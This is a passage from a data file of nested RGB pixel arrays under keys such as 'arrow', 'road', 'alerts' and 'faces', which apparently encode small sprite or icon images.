[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 
0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 
0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], 
[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 
0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 
0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], 
[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]]], 'arrow': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 46, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 1, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [98, 46, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [0, 1, 0], [0, 0, 0], [98, 46, 213], [99, 47, 212], [0, 0, 1], [0, 0, 0], [1, 1, 1], [0, 0, 0], [1, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 
0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [1, 1, 0], [98, 46, 213], [98, 46, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [99, 46, 212], [1, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 1], [0, 1, 0], [1, 0, 1], [1, 1, 0]], [[1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 1], [99, 47, 212], [98, 46, 213], [0, 0, 0], [0, 1, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [98, 46, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [99, 47, 212], [99, 47, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 1, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 46, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[1, 1, 0], [1, 0, 1], [0, 1, 0], [0, 0, 1], [0, 0, 1], [0, 1, 1], [1, 1, 1], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [1, 0, 0], [99, 46, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [98, 46, 212], [98, 46, 213], [1, 1, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 
0], [0, 0, 0], [0, 1, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]]], 'road': [[[255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 254], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 254, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 254, 254], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 254], [255, 255, 255], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255]], [[255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 254], 
[255, 255, 255], [255, 254, 255], [255, 255, 255], [255, 254, 255], [255, 255, 255], [255, 255, 254], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 254, 255]], [[255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 254, 254], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 254], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 254], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [254, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 254]]], 'alerts': [[[0, 0, 1], [0, 1, 0], [0, 0, 0], [0, 1, 1], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 1, 0], [0, 1, 0], [1, 1, 0], [244, 67, 54], [0, 1, 0], [1, 1, 0], [244, 67, 54], [0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 0, 0], [244, 67, 54], [0, 0, 0], [0, 0, 0], [244, 67, 54], [0, 0, 0], [1, 1, 0], [1, 1, 1], [0, 0, 0], [244, 67, 54], [1, 1, 0], [1, 1, 0], [244, 67, 54], [1, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0], [244, 67, 54], [1, 1, 1], [0, 0, 0], [244, 67, 54], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [1, 1, 0], [0, 0, 0], [244, 67, 54], [0, 1, 1], [0, 0, 0], [244, 67, 55], [0, 0, 0], 
[1, 1, 0], [0, 0, 0], [0, 1, 0], [1, 0, 0], [1, 0, 0], [0, 1, 1], [0, 0, 0], [0, 0, 0], [1, 0, 0]]], 'faces': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [37, 0, 82], [0, 1, 1], [0, 0, 0], [37, 0, 82], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 0], [74, 20, 140], [0, 0, 0], [0, 0, 0], [74, 20, 140], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [63, 81, 181], [1, 1, 0], [0, 0, 0], [63, 81, 181], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [244, 67, 54], [236, 91, 81], [244, 67, 54], [244, 67, 54], [0, 0, 0], [1, 1, 0], [0, 0, 0], [244, 66, 54], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 0], [244, 67, 54], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 73], [121, 85, 72], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [121, 84, 72], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [0, 0, 0], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [0, 1, 0], [255, 204, 188], [255, 204, 188], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [255, 204, 188], [254, 205, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [0, 0, 0], [255, 87, 34], [255, 87, 34], [255, 204, 188], 